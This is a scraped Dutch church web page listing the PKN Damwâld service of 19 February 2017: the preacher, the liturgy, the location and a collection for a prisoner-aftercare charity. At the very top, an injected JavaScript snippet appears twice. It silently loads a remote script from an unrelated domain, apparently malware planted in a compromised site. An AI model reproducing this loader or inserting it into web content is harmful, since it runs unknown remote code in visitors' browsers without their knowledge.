;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 19 februari 2017 9:30 uur - PKN Damwâld
zondag 19 februari 2017
09:30 uur

Kerkdienst zondag 19 februari 2017 9:30 uur

Thema: “Bezorgdheid”

Informatie

Voorganger:Ds. G. Timmer
Organist:Nienke van der Heide-Visser
Thema:“Bezorgdheid”
Liturgie
Lied voor de dienst ELB 185: 1 en 2
Welkom en mededelingen
Intochtslied Psalm 150: 1 en 2
Stil gebed, bemoediging en groet
We zingen: Gezang 488: 1, 2, 3, 4 en 5
Wetlezing
We zingen: Psalm 65: 1 en 2
Gebed om de opening van het Woord
We lezen: Mattheüs 6: 24-34
We zingen: Psalm 65: 4, 5 en 6
Verkondiging : “Bezorgdheid”
We zingen: ELB 161: 1, 2 en 3
Dankgebed en voorbeden
Collecte
Slotlied: Gezang 293: 1, 2, 3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Gevangenzorg Nederland

Gevangenenzorg Nederland is een Christelijke vrijwilligersorganisatie. Vrijwilligers begeleiden de ex-gevangene en worden daarbij ondersteund door professionals vanuit kantoor. Meestal is het contact tussen vrijwilliger en ex-gedetineerde al tijdens detentie opgebouwd en is er daardoor al langere tijd contact waardoor er een vertrouwensband is ontstaan. De vrijwilliger heeft al tijdens detentie met de (ex-) gevangene gesproken over re-integratie na detentie en meegedacht op het gebied van wonen, relaties, financiën en werk of dagbesteding. De vrijwilliger bezoekt ook na detentie regelmatig de ex-gevangene en houdt contact over de ontwikkelingen op al deze gebieden. De vrijwilliger informeert de kantoorcollega's hierover zodat goede ondersteuning kan worden geboden en daarnaast indien nodig de vrijwilliger kan motiveren en adviseren. Gevangenenzorg blijft daarom, afhankelijk van de wens van alle partijen, ook na detentie nog een tijd betrokken.

Tweede collecte: Kerk
Uitganscollecte: Kerk